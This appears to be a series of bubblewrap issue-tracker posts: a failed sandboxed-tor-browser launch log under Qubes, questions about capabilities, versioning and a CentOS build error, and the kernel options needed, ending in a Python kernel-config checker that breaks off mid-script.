2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXext.so.6 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXt.so.6 imports: [libSM.so.6 libICE.so.6 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libc.so.6 imports: [ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXau.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libatk-1.0.so.0 imports: [libgobject-2.0.so.0 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so imports: [libgdk_pixbuf-2.0.so.0 libgmodule-2.0.so.0 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libpng12.so.0 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplds4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpangocairo-1.0.so.0 imports: [libpango-1.0.so.0 libgobject-2.0.so.0 libgmodule-2.0.so.0 libgthread-2.0.so.0 libglib-2.0.so.0 libcairo.so.2 libm.so.6 libpangoft2-1.0.so.0 libfontconfig.so.1 libfreetype.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor/libasan.so.2 imports: [librt.so.1 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libc.so.6 ld-linux-x86-64.so.2 libgcc_s.so.1]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libm.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/printbackends/libprintbackend-file.so imports: [libgtk-x11-2.0.so.0 libgdk-x11-2.0.so.0 libpangocairo-1.0.so.0 libX11.so.6 libXcomposite.so.1 libXdamage.so.1 libXfixes.so.3 libatk-1.0.so.0 libcairo.so.2 libgdk_pixbuf-2.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libpango-1.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libfontconfig.so.1 libfreetype.so.6 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libdbus-1.so.3 imports: [libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0 imports: [libgdk-x11-2.0.so.0 libgmodule-2.0.so.0 libpangocairo-1.0.so.0 libX11.so.6 libXcomposite.so.1 libXdamage.so.1 libXfixes.so.3 libatk-1.0.so.0 libcairo.so.2 libgdk_pixbuf-2.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libpango-1.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libfontconfig.so.1 libfreetype.so.6 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnspr4.so imports: [libasan.so.2 libdl.so.2 libpthread.so.0 librt.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libfreetype.so.6 imports: [libz.so.1 libpng12.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXrender.so.1 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXdamage.so.1 imports: [libXfixes.so.3 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXfixes.so.3 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 imports: []
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libexpat.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXi.so.6 imports: [libX11.so.6 libXext.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libxcb-render.so.0 imports: [libxcb.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libresolv.so.2 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXcomposite.so.1 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libSM.so.6 imports: [libICE.so.6 libuuid.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libICE.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libpcre.so.3 imports: [libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpixman-1.so.0 imports: [libm.so.6 libpthread.so.0 libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0 imports: [libxcb.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libpng12.so.0 imports: [libz.so.1 libm.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libz.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXinerama.so.1 imports: [libX11.so.6 libXext.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXcursor.so.1 imports: [libXrender.so.1 libXfixes.so.3 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgmodule-2.0.so.0 imports: [libdl.so.2 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libthai.so.0 imports: [libdatrie.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libharfbuzz.so.0 imports: [libglib-2.0.so.0 libfreetype.so.6 libgraphite2.so.3 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libffi.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libselinux.so.1 imports: [libpcre.so.3 libdl.so.2 libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXrandr.so.2 imports: [libXext.so.6 libXrender.so.1 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libuuid.so.1 imports: [libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libdatrie.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgraphite2.so.3 imports: [libc.so.6]
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libc-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libdbus-1.so.3.8.13
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libdl-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libexpat.so.1.6.0
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libgcc_s.so.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libglib-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libm-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libpcre.so.3.13.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libpng12.so.0.50.0
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libpthread-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libresolv-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/librt-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libselinux.so.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libuuid.so.1.3.0
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libz.so.1.2.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libICE.so.6.3.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libSM.so.6.0.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXcomposite.so.1.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXcursor.so.1.0.2
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXdamage.so.1.1.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXfixes.so.3.1.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXi.so.6.1.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXrandr.so.2.2.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXrender.so.1.3.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libXt.so.6.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libasound.so.2.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libatk-1.0.so.0.21409.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libcairo.so.2.11400.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libdatrie.so.1.3.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libdbus-glib-1.so.2.2.2
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libffi.so.6.0.2
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libfontconfig.so.1.8.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libfreetype.so.6.11.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgdk-x11-2.0.so.0.2400.25
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0.3100.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgmodule-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgraphite2.so.3.0.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0.2400.25
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libharfbuzz.so.0.935.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpango-1.0.so.0.3600.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpangocairo-1.0.so.0.3600.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpangoft2-1.0.so.0.3600.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libpixman-1.so.0.32.6
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libthai.so.0.2.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libxcb-render.so.0.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0.0.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
2016/12/25 05:35:20 sandbox: fdArgs: [--dev /dev --tmpfs /tmp --setenv XDG_RUNTIME_DIR /run/user/1000 --dir /run/user/1000 --setenv HOME /home/amnesia --dir /home/amnesia --unshare-user --unshare-ipc --unshare-pid --unshare-net --unshare-uts --unshare-cgroup-try --hostname amnesia --proc /proc --chdir /home/amnesia/sandboxed-tor-browser/tor-browser/Browser --uid 1000 --gid 1000 --seccomp 10 --info-fd 11 --setenv DISPLAY :0 --dir /tmp/.X11-unix --bind /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 --ro-bind /usr/share/themes/Adwaita/gtk-2.0 /usr/share/themes/Adwaita/gtk-2.0 --ro-bind /usr/share/icons/Adwaita /usr/share/icons/Adwaita --ro-bind /usr/share/icons/hicolor /usr/share/icons/hicolor --ro-bind /usr/share/mime /usr/share/mime --setenv GTK2_RC_FILES /home/amnesia/.gtkrc-2.0 --file 4 /home/amnesia/.gtkrc-2.0 --ro-bind /usr/share/libthai/thbrk.tri /usr/share/libthai/thbrk.tri --ro-bind /home/user/.local/share/sandboxed-tor-browser/tor-browser /home/amnesia/sandboxed-tor-browser/tor-browser --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/Desktop /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Desktop --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/Downloads /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Downloads --bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/Caches /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/Caches --ro-bind /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/preferences /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/preferences --ro-bind 
/home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/extensions /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/Browser/profile.default/extensions --setenv LD_LIBRARY_PATH /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor --setenv FONTCONFIG_PATH /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Data/fontconfig --setenv FONTCONFIG_FILE fonts.conf --setenv ASAN_OPTIONS detect_leaks=0 --setenv NSS_DISABLE_HW_AES 1 --symlink /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Desktop /home/amnesia/Desktop --symlink /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/Downloads /home/amnesia/Downloads --setenv TOR_SOCKS_PORT 9150 --setenv TOR_CONTROL_PORT 9151 --setenv TOR_SKIP_LAUNCH 1 --setenv TOR_NO_DISPLAY_NETWORK_SETTINGS 1 --setenv TOR_STUB_CONTROL_SOCKET /run/user/1000/control --setenv TOR_STUB_SOCKS_SOCKET /run/user/1000/socks --bind /run/user/1000/sandboxed-tor-browser/control /run/user/1000/control --bind /run/user/1000/sandboxed-tor-browser/socks /run/user/1000/socks --file 5 /home/amnesia/.tbb_stub.so --setenv LD_PRELOAD libasan.so.2:/home/amnesia/.tbb_stub.so --setenv LIBGL_ALWAYS_SOFTWARE 1 --ro-bind /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/engines/libadwaita.so /usr/lib/gtk-2.0/2.10.0/engines/libadwaita.so --ro-bind /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/engines/libpixmap.so /usr/lib/gtk-2.0/2.10.0/engines/libpixmap.so --ro-bind /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/printbackends/libprintbackend-file.so /usr/lib/gtk-2.0/2.10.0/printbackends/libprintbackend-file.so --setenv GTK_PATH /usr/lib/gtk-2.0 --ro-bind /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so --file 6 /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders.cache --setenv GDK_PIXBUF_MODULE_FILE /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders.cache --ro-bind /lib/x86_64-linux-gnu/ld-2.19.so 
/lib/ld-linux-x86-64.so.2 --ro-bind /lib/x86_64-linux-gnu/libc-2.19.so /usr/lib/libc.so.6 --ro-bind /lib/x86_64-linux-gnu/libdbus-1.so.3.8.13 /usr/lib/libdbus-1.so.3 --ro-bind /lib/x86_64-linux-gnu/libdl-2.19.so /usr/lib/libdl.so.2 --ro-bind /lib/x86_64-linux-gnu/libexpat.so.1.6.0 /usr/lib/libexpat.so.1 --ro-bind /lib/x86_64-linux-gnu/libgcc_s.so.1 /usr/lib/libgcc_s.so.1 --ro-bind /lib/x86_64-linux-gnu/libglib-2.0.so.0.4200.1 /usr/lib/libglib-2.0.so.0 --ro-bind /lib/x86_64-linux-gnu/libm-2.19.so /usr/lib/libm.so.6 --ro-bind /lib/x86_64-linux-gnu/libpcre.so.3.13.1 /usr/lib/libpcre.so.3 --ro-bind /lib/x86_64-linux-gnu/libpng12.so.0.50.0 /usr/lib/libpng12.so.0 --ro-bind /lib/x86_64-linux-gnu/libpthread-2.19.so /usr/lib/libpthread.so.0 --ro-bind /lib/x86_64-linux-gnu/libresolv-2.19.so /usr/lib/libresolv.so.2 --ro-bind /lib/x86_64-linux-gnu/librt-2.19.so /usr/lib/librt.so.1 --ro-bind /lib/x86_64-linux-gnu/libselinux.so.1 /usr/lib/libselinux.so.1 --ro-bind /lib/x86_64-linux-gnu/libuuid.so.1.3.0 /usr/lib/libuuid.so.1 --ro-bind /lib/x86_64-linux-gnu/libz.so.1.2.8 /usr/lib/libz.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libICE.so.6.3.0 /usr/lib/libICE.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libSM.so.6.0.1 /usr/lib/libSM.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0 /usr/lib/libX11.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0 /usr/lib/libXau.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXcomposite.so.1.0.0 /usr/lib/libXcomposite.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXcursor.so.1.0.2 /usr/lib/libXcursor.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXdamage.so.1.1.0 /usr/lib/libXdamage.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0 /usr/lib/libXdmcp.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0 /usr/lib/libXext.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXfixes.so.3.1.0 /usr/lib/libXfixes.so.3 --ro-bind /usr/lib/x86_64-linux-gnu/libXi.so.6.1.0 /usr/lib/libXi.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0 
/usr/lib/libXinerama.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXrandr.so.2.2.0 /usr/lib/libXrandr.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libXrender.so.1.3.0 /usr/lib/libXrender.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libXt.so.6.0.0 /usr/lib/libXt.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libasound.so.2.0.0 /usr/lib/libasound.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libatk-1.0.so.0.21409.1 /usr/lib/libatk-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libcairo.so.2.11400.0 /usr/lib/libcairo.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libdatrie.so.1.3.1 /usr/lib/libdatrie.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libdbus-glib-1.so.2.2.2 /usr/lib/libdbus-glib-1.so.2 --ro-bind /usr/lib/x86_64-linux-gnu/libffi.so.6.0.2 /usr/lib/libffi.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libfontconfig.so.1.8.0 /usr/lib/libfontconfig.so.1 --ro-bind /usr/lib/x86_64-linux-gnu/libfreetype.so.6.11.1 /usr/lib/libfreetype.so.6 --ro-bind /usr/lib/x86_64-linux-gnu/libgdk-x11-2.0.so.0.2400.25 /usr/lib/libgdk-x11-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0.3100.1 /usr/lib/libgdk_pixbuf-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0.4200.1 /usr/lib/libgio-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgmodule-2.0.so.0.4200.1 /usr/lib/libgmodule-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0.4200.1 /usr/lib/libgobject-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgraphite2.so.3.0.1 /usr/lib/libgraphite2.so.3 --ro-bind /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0.4200.1 /usr/lib/libgthread-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0.2400.25 /usr/lib/libgtk-x11-2.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libharfbuzz.so.0.935.0 /usr/lib/libharfbuzz.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpango-1.0.so.0.3600.8 /usr/lib/libpango-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpangocairo-1.0.so.0.3600.8 /usr/lib/libpangocairo-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpangoft2-1.0.so.0.3600.8 
/usr/lib/libpangoft2-1.0.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libpixman-1.so.0.32.6 /usr/lib/libpixman-1.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libthai.so.0.2.0 /usr/lib/libthai.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libxcb-render.so.0.0.0 /usr/lib/libxcb-render.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0.0.0 /usr/lib/libxcb-shm.so.0 --ro-bind /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0 /usr/lib/libxcb.so.1 --symlink /lib /lib64 --symlink /usr/lib /usr/lib64 --setenv LD_LIBRARY_PATH /home/amnesia/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor:/usr/lib --file 7 /etc/passwd --file 8 /etc/group --file 9 /var/lib/dbus/machine-id --symlink /var/lib/dbus/machine-id /etc/machine-id]
2016/12/25 05:35:20 sandbox: bwrap pid is: 16202
2016/12/25 05:35:20 sandbox: child pid is: 16203
2016/12/25 05:35:20 launch: Complete.
2016/12/25 05:35:20 firefox: Can't mount proc on /newroot/proc
2016/12/25 05:35:20 firefox: : Operation not permitted
2016/12/25 05:35:20 fatal error in the user interface: waitid: no child processes
A simple test (bwrap --ro-bind / / --proc /proc --dev /dev /bin/bash) worked for me.
Outside of Qubes, i.e. in a non-Qubes Debian jessie (VirtualBox) VM, sandboxed-tor-browser works fine.
So I guess "something that Qubes does breaks bubblewrap". Could you please help us make this more specific?
I've been advised to:
- Rebuild bubblewrap with strategic debugging instrumentation added.
- Use ptrace/ltrace/gdb to figure out what's actually going on.
Do you know why this is happening? How to fix this? Want any debug output? If you would like a rebuild of bubblewrap with debugging enabled, where do I find build instructions?
When using user namespaces to create a jail, I still have access to capabilities like CAP_SYS_ADMIN
I would like to be able to tell the wrapper to drop all capabilities without exceptions when run as a normal user.
Please note that user namespaces reset capabilities. Inside a user namespace all capabilities are available to the user by default.
Is there a reason for the (seemingly) overlapping functionality of bubblewrap to the Google nsjails project?
We haven't yet done a release, I think we should.
Maybe let's use 0.1.0
implementing semver?
I've been using YEAR.SERIAL for ostree since I don't think semver applies as much to non-libraries, but bubblewrap is kind of a library.
Compilation fails on CentOS 7 at the xsltproc step:
sudo yum install git autoconf gcc make automake libcap-devel
git clone https://github.com/projectatomic/bubblewrap --depth 1
cd bubblewrap/
./autogen.sh
make
make all-am
make[1]: Entering directory `/home/me/bubblewrap'
xsltproc --nonet --stringparam man.output.quietly 1 --stringparam funcsynopsis.style ansi --stringparam man.th.extra1.suppress 1 --stringparam man.authors.section.enabled 0 --stringparam man.copyright.section.enabled 0 http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl bwrap.xml
I/O error : Attempt to load network entity http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl
warning: failed to load external entity "http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl"
cannot parse http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl
From my tests, you'd need at least:
CONFIG_NAMESPACES=y
CONFIG_UTS_NS=y
CONFIG_IPC_NS=y
CONFIG_USER_NS=y
CONFIG_PID_NS=y
CONFIG_NET_NS=y
CONFIG_DEVPTS_MULTIPLE_INSTANCES
enabled. CONFIG_OVERLAY_FS for mounts. Separately, FUSE would be needed for Flatpak.
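To check a kernel against that list, here is an added Python example (mine, not part of bubblewrap or of the comment above). It reads the running kernel's config from /proc/config.gz or /boot/config-<release>, reports which of the listed options are not built in, and also checks the sysctls that can switch off unprivileged user namespaces even when CONFIG_USER_NS=y, since that is the usual reason a non-setuid bwrap fails on an otherwise capable kernel. The option names are copied from the comment; the "absent" state covers an option the running kernel simply does not know (CONFIG_DEVPTS_MULTIPLE_INSTANCES disappeared once every devpts mount became independent), so an absent entry is a version question rather than a missing feature.

```python
import gzip
import os
import platform

# Options the comment above lists for bwrap itself. CONFIG_OVERLAY_FS and FUSE
# are kept separate because they are for overlay mounts and Flatpak, not bwrap.
REQUIRED_OPTIONS = (
    "CONFIG_NAMESPACES", "CONFIG_UTS_NS", "CONFIG_IPC_NS",
    "CONFIG_USER_NS", "CONFIG_PID_NS", "CONFIG_NET_NS",
    "CONFIG_DEVPTS_MULTIPLE_INSTANCES",
)
EXTRA_OPTIONS = ("CONFIG_OVERLAY_FS", "CONFIG_FUSE_FS")


def parse_kernel_config(text):
    """Map CONFIG_* names to their value: 'y', 'm', a string value, or 'n'
    for '# CONFIG_X is not set' lines."""
    values = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("# CONFIG_") and line.endswith(" is not set"):
            values[line[2:-len(" is not set")]] = "n"
        elif line.startswith("CONFIG_") and "=" in line:
            name, _, value = line.partition("=")
            values[name] = value.strip('"')
    return values


def option_states(config, names):
    """State of each option: 'y', 'm', 'n', or 'absent' when the config does
    not mention it at all (an option removed in newer kernels, such as
    CONFIG_DEVPTS_MULTIPLE_INSTANCES, shows up as 'absent')."""
    return {name: config.get(name, "absent") for name in names}


def missing_options(config, required=REQUIRED_OPTIONS):
    """Names that are not built in. Namespaces cannot be modules, so 'm'
    counts as missing as well."""
    return [name for name, state in option_states(config, required).items()
            if state != "y"]


def load_running_config():
    """Running kernel's config from /proc/config.gz (needs CONFIG_IKCONFIG_PROC)
    or the distro's /boot/config-<release>; None if neither exists."""
    if os.path.exists("/proc/config.gz"):
        with gzip.open("/proc/config.gz", "rt") as f:
            return f.read()
    path = "/boot/config-" + platform.release()
    if os.path.exists(path):
        with open(path) as f:
            return f.read()
    return None


def unprivileged_userns_blocked():
    """CONFIG_USER_NS=y is necessary but not sufficient for a non-setuid bwrap:
    Debian-style kernels add kernel.unprivileged_userns_clone, and
    user.max_user_namespaces=0 disables the feature on any kernel. Returns the
    sysctl path that blocks it, or None."""
    checks = {
        "/proc/sys/kernel/unprivileged_userns_clone": "0",
        "/proc/sys/user/max_user_namespaces": "0",
    }
    for path, disabled in checks.items():
        try:
            with open(path) as f:
                if f.read().strip() == disabled:
                    return path
        except OSError:
            pass
    return None


if __name__ == "__main__":
    text = load_running_config()
    if text is None:
        raise SystemExit("no kernel config found; enable CONFIG_IKCONFIG_PROC")
    config = parse_kernel_config(text)
    for name, state in option_states(config, REQUIRED_OPTIONS).items():
        if state != "y":
            print("bwrap option not built in:", name, state)
    for name, state in option_states(config, EXTRA_OPTIONS).items():
        if state != "y":
            print("overlay/Flatpak option not built in:", name, state)
    blocker = unprivileged_userns_blocked()
    if blocker:
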